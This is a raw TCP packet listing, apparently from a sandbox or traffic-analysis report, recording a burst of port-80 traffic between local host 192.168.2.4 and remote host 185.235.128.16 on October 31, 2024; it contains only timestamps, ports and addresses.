                                                                                                                                            Oct 31, 2024 17:12:05.332799911 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.332834959 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.333586931 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.333600044 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.333610058 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.333621025 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.333626032 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.333626986 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.333631992 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.333638906 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.333642006 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.333645105 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.333729029 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.448056936 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448120117 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448128939 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.448131084 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448163986 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.448190928 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.448267937 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448278904 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448311090 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.448328018 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.448466063 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448477983 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448517084 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.448725939 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448780060 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.448807001 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448817968 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448834896 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448848009 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.448853970 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.448884010 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.449223042 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449268103 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.449404955 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449415922 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449431896 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449455023 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.449484110 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.449771881 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449784040 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449795008 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449805975 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449816942 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449819088 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.449829102 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.449846983 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.449866056 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.450428009 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.450438023 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.450448990 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.450459957 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.450467110 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.450470924 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.450506926 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.450531960 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.451014996 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451025963 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451035976 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451049089 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451064110 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.451093912 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.451545000 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451555967 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451569080 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451581001 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451591015 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451592922 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.451603889 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.451612949 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.451631069 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.451662064 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.452415943 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.452428102 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.452436924 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.452449083 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.452460051 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.452466965 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.452471018 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.452482939 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.452487946 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.452500105 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.452510118 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.452518940 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.452543020 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.452557087 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.567156076 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.567222118 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.567240953 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.567306042 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.567354918 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.567368031 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.567384005 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.567404032 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.567409992 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.567423105 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.567430019 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.567436934 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.567501068 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.568073988 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.568094015 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.568118095 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.568159103 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.568245888 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.568260908 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.568295956 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.568321943 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.568465948 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.568504095 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.568532944 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.568547010 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.568561077 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.568564892 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.568577051 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.568593979 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.568613052 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.569217920 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.569236994 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.569252968 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.569258928 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.569271088 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.569286108 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.569293976 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.569300890 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.569315910 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.569329977 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.569360971 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.569371939 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.570107937 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.570127964 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.570142031 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.570147991 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.570156097 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.570169926 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.570178986 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.570190907 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.570190907 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.570193052 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.570209026 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.570216894 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.570245028 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.570976973 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.570996046 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571011066 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571016073 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.571027040 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571042061 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571046114 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.571057081 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571069956 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571075916 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.571098089 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.571125984 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.571877003 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571913004 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.571913958 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571928978 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571943045 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571947098 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.571957111 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571964979 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.571970940 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.571985960 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.572000027 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.572000027 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.572017908 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.572046041 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.685888052 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.685926914 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.685940027 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.685957909 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.686002016 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.686002016 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.686184883 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.686223030 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.686362028 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.686372995 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.686383009 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.686394930 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.686395884 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.686407089 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.686429024 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.686429024 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.686459064 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.686928034 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.686968088 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.687084913 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687096119 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687105894 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687117100 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687128067 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.687128067 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687170982 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.687194109 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.687655926 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687666893 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687700033 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.687717915 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687724113 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.687731028 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687742949 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687755108 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.687771082 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.687772036 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.687792063 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.688622952 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.688636065 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.688646078 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.688671112 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.688673973 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.688694954 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.688699961 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.688718081 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.688724041 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.688759089 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.688765049 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.688787937 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.688808918 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.689532995 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.689543962 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.689553976 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.689564943 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.689570904 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.689577103 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.689583063 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.689615011 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.689640999 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.690428972 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.690439939 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.690448999 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.690462112 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.690471888 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.690475941 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.690483093 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.690493107 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.690495968 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.690505028 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.690517902 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.690542936 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.691261053 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.691273928 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.691283941 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.691296101 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.691303968 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.691307068 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.691339016 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.691364050 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.804672956 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.804703951 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.804713964 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.804811954 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.804822922 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.804840088 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.804845095 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.804883957 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.805085897 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805098057 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805109024 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805128098 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.805156946 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.805460930 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805473089 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805505991 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.805675030 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805691957 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805720091 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.805746078 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.805913925 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805926085 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805943012 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805955887 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805959940 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.805968046 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805979967 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.805989981 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.806015968 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.806528091 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.806575060 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.806709051 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.806720018 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.806731939 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.806742907 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.806747913 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.806754112 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.806786060 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.806802988 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.807200909 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.807213068 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.807235003 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.807264090 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.807420969 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.807431936 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.807441950 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.807454109 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.807465076 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.807466030 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.807476997 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.807488918 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.807497978 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.807517052 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.807542086 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.808351994 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.808365107 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.808374882 CET8049730185.235.128.16192.168.2.4
